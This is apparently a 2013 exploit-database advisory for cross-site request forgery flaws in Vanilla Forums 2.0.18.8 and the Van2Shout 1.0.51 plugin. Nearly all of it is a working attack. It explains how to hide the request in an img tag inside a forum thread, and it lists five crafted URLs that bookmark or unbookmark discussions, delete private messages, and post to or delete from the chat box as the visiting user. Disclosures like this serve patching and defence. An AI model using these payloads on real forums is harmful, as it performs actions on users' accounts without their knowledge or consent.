# Exploit Title:
Vanilla Forums <=2.0.18.8& Van2Shout 1.0.51 Multiple CSRF
# Google Dork: n/a# Date: 13/4/13# Exploit Author: Henry Hoggard# Vendor Homepage: [http://vanillaforums.org/ ,
http://vanillaforums.org/addon/van2shout-plugin]# Software Link: [http://vanillaforums.org/download,
http://vanillaforums.org/get/van2shout-plugin-1.051]# Version: [2.0.18.8 , 1.0.51]# Tested on: [Debian]# CVE :=======================
You can exploit these by having the user visit a thread with the img src
of the below urls.
eg <img
src="http://site.org/index.php=/vanilla/discussion/bookmark/1337?> where
1337is the id.
Bookmark CSRF:
http://site.org/index.php=/vanilla/discussion/bookmark/1337
UnBookmark CSRF
http://site.org/index.php=/vanilla/discussion/bookmark/1337?
Delete Message CSRF
http://site.org/index.php=/messages/clear/1337
Post to Van2Shout Chat Box CSRF
http://site.org/index.php?p=/plugin/Van2ShoutData&newpost=testmessage
Delete Message from Van2Shout Chatbox CSRF
http://site.org/index.php?p=/plugin/Van2ShoutData&del=1337
